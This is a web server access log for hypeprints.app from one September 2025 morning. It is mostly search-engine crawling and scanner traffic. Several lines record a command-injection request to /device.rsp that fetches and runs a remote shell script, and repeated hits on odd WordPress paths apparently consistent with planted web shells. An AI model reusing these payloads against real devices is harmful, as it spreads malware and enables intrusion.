40.77.167.150 - - [16/Sep/2025:08:04:26 -0700] "GET /?travel-supplies/reels/1lj8a HTTP/1.1" 200 1 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.68" 7 **0/7912**
204.12.252.98 - - [16/Sep/2025:08:06:23 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 5 **0/5504**
40.77.167.150 - - [16/Sep/2025:08:06:57 -0700] "GET /s3338768/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 9 **0/9125**
52.167.144.202 - - [16/Sep/2025:08:09:50 -0700] "GET /ks2557007/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10736**
52.167.144.202 - - [16/Sep/2025:08:11:08 -0700] "GET /ks4521269/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 5 **0/5284**
208.110.64.178 - - [16/Sep/2025:08:14:03 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 10 **0/10673**
43.131.26.226 - - [16/Sep/2025:08:19:04 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 10 **0/10930**
208.110.64.178 - - [16/Sep/2025:08:20:14 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 8 **0/8909**
52.167.144.147 - - [16/Sep/2025:08:20:52 -0700] "GET /a2602415/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 5 **0/5058**
157.55.39.55 - - [16/Sep/2025:08:28:29 -0700] "GET /j4153794/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10901**
52.167.144.197 - - [16/Sep/2025:08:28:39 -0700] "GET /xe1132019/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 12 **0/12334**
204.12.252.98 - - [16/Sep/2025:08:30:20 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 6 **0/6670**
52.167.144.197 - - [16/Sep/2025:08:35:50 -0700] "GET /u2448489/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10529**
91.224.92.17 - - [16/Sep/2025:08:36:23 -0700] "GET / HTTP/1.1" 200 - "-" "-" 10 **0/10065**
52.167.144.18 - - [16/Sep/2025:08:38:06 -0700] "GET /xe1359571/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 5 **0/5347**
208.110.64.178 - - [16/Sep/2025:08:38:29 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 6 **0/6732**
52.167.144.188 - - [16/Sep/2025:08:39:40 -0700] "GET /wf2496456/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4377**
52.167.144.188 - - [16/Sep/2025:08:43:15 -0700] "GET /lz2017946/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10051**
208.110.64.178 - - [16/Sep/2025:08:43:40 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 9 **0/9182**
206.168.34.223 - - [16/Sep/2025:08:46:06 -0700] "\x16\x03\x01" 400 - "-" "-" 8 **0/8837**
206.168.34.223 - - [16/Sep/2025:08:46:07 -0700] "GET /robots.txt HTTP/1.1" 200 129 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 2 **0/2779**
204.12.252.98 - - [16/Sep/2025:08:51:41 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 7 **0/7832**
208.110.64.178 - - [16/Sep/2025:08:59:16 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 9 **0/9005**
204.12.252.98 - - [16/Sep/2025:09:02:56 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 514 **0/514491**
52.167.144.191 - - [16/Sep/2025:09:04:27 -0700] "GET /a3804306/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10643**
40.77.167.67 - - [16/Sep/2025:09:08:15 -0700] "GET /u4036945/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 11 **0/11544**
52.167.144.198 - - [16/Sep/2025:09:12:01 -0700] "GET /?diet/vitamins/2mkbr HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 11 **0/11556**
52.167.144.170 - - [16/Sep/2025:09:16:20 -0700] "GET /wf1178022/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 11 **0/11045**
208.110.64.178 - - [16/Sep/2025:09:16:44 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 6 **0/6332**
52.167.144.188 - - [16/Sep/2025:09:21:46 -0700] "GET /?sports/clubs/172sd HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 8 **0/8368**
52.167.144.188 - - [16/Sep/2025:09:21:46 -0700] "GET /u941151/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 3 **0/3770**
52.167.144.188 - - [16/Sep/2025:09:21:47 -0700] "GET /wf2980553/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4044**
52.167.144.188 - - [16/Sep/2025:09:21:47 -0700] "GET /a2039274/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 6 **0/6116**
64.227.182.200 - - [16/Sep/2025:09:22:55 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" 4 **0/4031**
64.227.182.200 - - [16/Sep/2025:09:22:55 -0700] "GET /favicon.ico HTTP/1.1" 200 - "http://www.hypeprints.app/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" 9 **0/9944**
52.167.144.206 - - [16/Sep/2025:09:28:08 -0700] "GET /s3874756/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 11 **0/11506**
52.167.144.206 - - [16/Sep/2025:09:28:13 -0700] "GET /wf2493124/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10075**
208.110.64.178 - - [16/Sep/2025:09:28:41 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 10 **0/10944**
52.167.144.188 - - [16/Sep/2025:09:30:41 -0700] "GET /w1241167/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 3 **0/3118**
192.159.99.101 - - [16/Sep/2025:09:35:17 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" 11 **0/11294**
192.159.99.101 - - [16/Sep/2025:09:35:22 -0700] "GET login.cgi HTTP/1.1" 400 - "-" "-" 6 **0/6704**
192.159.99.101 - - [16/Sep/2025:09:35:22 -0700] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget%20http%3A%2F%2F145.223.69.204%2Ftbk.sh%20-O-%20%7C%20sh HTTP/1.1" 200 - "-" "Mozila/5.0" 11 **0/11060**
192.159.99.101 - - [16/Sep/2025:09:35:22 -0700] "GET / HTTP/1.0" 200 - "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 5 **0/5065**
204.12.252.98 - - [16/Sep/2025:09:35:22 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 4 **0/4017**
192.159.99.101 - - [16/Sep/2025:09:35:22 -0700] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 - "-" "Go-http-client/1.1" 10 **0/10795**
192.159.99.101 - - [16/Sep/2025:09:35:22 -0700] "GET login.cgi HTTP/1.1" 400 - "-" "-" 8 **0/8631**
192.159.99.101 - - [16/Sep/2025:09:35:22 -0700] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=wget%20http%3A%2F%2F145.223.69.204%2Ftbk.sh%20-O-%20%7C%20sh HTTP/1.1" 200 - "-" "Mozila/5.0" 11 **0/11954**
192.159.99.101 - - [16/Sep/2025:09:35:22 -0700] "GET / HTTP/1.0" 200 - "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 4 **0/4858**
192.159.99.101 - - [16/Sep/2025:09:35:22 -0700] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 - "-" "Go-http-client/1.1" 10 **0/10013**
208.110.64.178 - - [16/Sep/2025:09:35:55 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 11 **0/11108**
185.242.226.113 - - [16/Sep/2025:09:38:53 -0700] "\x16\x03\x01" 400 - "-" "-" 1 **0/1889**
185.242.226.113 - - [16/Sep/2025:09:41:40 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 10 **0/10477**
52.167.144.23 - - [16/Sep/2025:09:45:42 -0700] "GET /xe1056104/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 11 **0/11756**
199.244.88.229 - - [16/Sep/2025:09:47:14 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 10 **0/10836**
40.77.167.68 - - [16/Sep/2025:09:48:08 -0700] "GET /wf2726210/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 5 **0/5156**
40.77.167.68 - - [16/Sep/2025:09:49:26 -0700] "GET /wf4741911/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4661**
40.77.167.68 - - [16/Sep/2025:09:52:47 -0700] "GET /ks3602211/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 11 **0/11454**
208.110.64.178 - - [16/Sep/2025:09:54:20 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 10 **0/10215**
40.77.167.43 - - [16/Sep/2025:09:57:22 -0700] "GET /xe1917377/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 5 **0/5026**
40.77.167.50 - - [16/Sep/2025:09:59:54 -0700] "GET /s2330808/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10220**
204.12.252.98 - - [16/Sep/2025:10:05:35 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 517 **0/517220**
52.167.144.160 - - [16/Sep/2025:10:06:58 -0700] "GET /wf2522765/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 9 **0/9423**
52.167.144.160 - - [16/Sep/2025:10:07:03 -0700] "GET /u4072087/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10348**
40.77.167.151 - - [16/Sep/2025:10:12:38 -0700] "GET /wf899782/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10764**
40.77.167.151 - - [16/Sep/2025:10:13:00 -0700] "GET /a4534194/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 11 **0/11467**
40.77.167.151 - - [16/Sep/2025:10:13:00 -0700] "GET /t2824996/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4130**
40.77.167.151 - - [16/Sep/2025:10:15:00 -0700] "GET /s2569627/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4277**
167.94.145.106 - - [16/Sep/2025:10:23:04 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 7 **0/7237**
167.94.145.106 - - [16/Sep/2025:10:23:05 -0700] "GET /favicon.ico HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 3 **0/3584**
167.94.145.106 - - [16/Sep/2025:10:23:10 -0700] "GET /favicon.ico HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 11 **0/11207**
167.94.145.106 - - [16/Sep/2025:10:23:11 -0700] "GET /login HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 8 **0/8274**
208.110.64.178 - - [16/Sep/2025:10:25:05 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 11 **0/11027**
52.167.144.166 - - [16/Sep/2025:10:26:48 -0700] "GET /si2371621/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4215**
91.224.92.17 - - [16/Sep/2025:10:29:38 -0700] "GET / HTTP/1.1" 200 - "-" "-" 8 **0/8698**
204.12.252.98 - - [16/Sep/2025:10:32:25 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 4 **0/4158**
40.77.167.52 - - [16/Sep/2025:10:39:49 -0700] "GET /u2123136/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 7 **0/7786**
208.110.64.178 - - [16/Sep/2025:10:39:53 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 4 **0/4779**
208.110.64.178 - - [16/Sep/2025:10:52:17 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 10 **0/10686**
52.167.144.24 - - [16/Sep/2025:10:54:09 -0700] "GET /w2968715/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 11 **0/11015**
40.77.167.25 - - [16/Sep/2025:10:54:20 -0700] "GET /wf3161063/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 10 **0/10739**
40.77.167.57 - - [16/Sep/2025:10:58:21 -0700] "GET /j3158019/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4970**
43.166.131.228 - - [16/Sep/2025:10:58:50 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 10 **0/10809**
124.222.142.44 - - [16/Sep/2025:11:00:07 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 12 **0/12128**
40.77.167.25 - - [16/Sep/2025:11:00:24 -0700] "GET /wf1421506/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 9 **0/9751**
208.110.64.178 - - [16/Sep/2025:11:02:04 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 5 **0/5312**
43.166.244.251 - - [16/Sep/2025:11:14:20 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 10 **0/10995**
91.224.92.17 - - [16/Sep/2025:11:18:39 -0700] "GET / HTTP/1.1" 200 - "-" "-" 8 **0/8929**
204.12.252.98 - - [16/Sep/2025:11:23:57 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 9 **0/9664**
208.110.64.178 - - [16/Sep/2025:11:30:31 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 9 **0/9548**
52.167.144.16 - - [16/Sep/2025:11:30:50 -0700] "GET /?furniture/others/1xk8x HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 13 **0/13118**
52.167.144.170 - - [16/Sep/2025:11:30:51 -0700] "GET /si2049992/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 4 **0/4482**
40.77.167.4 - - [16/Sep/2025:11:34:58 -0700] "GET /wf3067638/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 9 **0/9245**
208.110.64.178 - - [16/Sep/2025:11:39:30 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 6 **0/6315**
40.77.167.4 - - [16/Sep/2025:11:41:02 -0700] "GET /u1501565/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 9 **0/9766**
40.77.167.4 - - [16/Sep/2025:11:41:04 -0700] "GET /j4196836/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 5 **0/5127**
110.77.158.197 - - [16/Sep/2025:11:43:11 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 4 **0/4788**
40.77.167.62 - - [16/Sep/2025:11:50:23 -0700] "GET /ks1181892/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 11 **0/11213**
52.167.144.159 - - [16/Sep/2025:11:57:36 -0700] "GET /s2838075/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 9 **0/9032**
52.167.144.20 - - [16/Sep/2025:11:58:13 -0700] "GET /u1020103/ HTTP/1.1" 200 1 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 9 **0/9207**
91.224.92.17 - - [16/Sep/2025:12:01:34 -0700] "GET / HTTP/1.1" 200 - "-" "-" 10 **0/10377**
208.110.64.178 - - [16/Sep/2025:12:02:59 -0700] "GET /wp-includes/edit.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/edit.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 11 **0/11123**
208.110.64.178 - - [16/Sep/2025:12:03:29 -0700] "GET /wp-includes/pl9f1ad1/install.php HTTP/1.1" 200 1 "http://hypeprints.app/wp-includes/pl9f1ad1/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 11 **0/11052**
